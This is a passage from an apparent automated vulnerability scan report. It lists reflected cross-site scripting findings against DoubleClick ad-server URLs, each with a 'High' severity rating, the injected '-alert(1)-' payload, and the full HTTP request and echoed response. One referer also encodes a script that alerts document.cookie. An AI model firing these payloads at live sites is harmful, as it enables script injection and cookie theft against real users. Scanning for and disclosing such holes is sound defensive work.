GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=2192e4ac"-alert(1)-"f286bd5be45&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9723

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=2192e4ac"-alert(1)-"f286bd5be45&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%
...[SNIP]...

4.11. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [pub parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97ae1"-alert(1)-"d5a8c8b632 was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=5866197ae1"-alert(1)-"d5a8c8b632&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9719

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
c%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=5866197ae1"-alert(1)-"d5a8c8b632&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl
...[SNIP]...

4.12. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [pubICode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1dd4"-alert(1)-"7f0ce352b24 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951d1dd4"-alert(1)-"7f0ce352b24&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9729

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
icles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951d1dd4"-alert(1)-"7f0ce352b24&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc
...[SNIP]...

4.13. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8de9"-alert(1)-"949f2676f9f was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798c8de9"-alert(1)-"949f2676f9f&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9729

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798c8de9"-alert(1)-"949f2676f9f&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3
...[SNIP]...

4.14. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9b6a"-alert(1)-"cafab609dca was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3Fd9b6a"-alert(1)-"cafab609dca&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:33:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9723

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3Fd9b6a"-alert(1)-"cafab609dca&redirectURL=http%3a%2f%2flp2.turbotax.com/ty10/bn/geo_tx%3Fcid%3Dbn_im_nf_anb_opgeotxT_txG_pk_300x250%26priorityCode%3D4654800000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "
...[SNIP]...

4.15. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [adurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.google/B2343920.91

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15c43"-alert(1)-"cd748a8fe0a was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=15c43"-alert(1)-"cd748a8fe0a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4961
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 02 Feb 2011 20:27:49 GMT
Expires: Wed, 02 Feb 2011 20:27:49 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
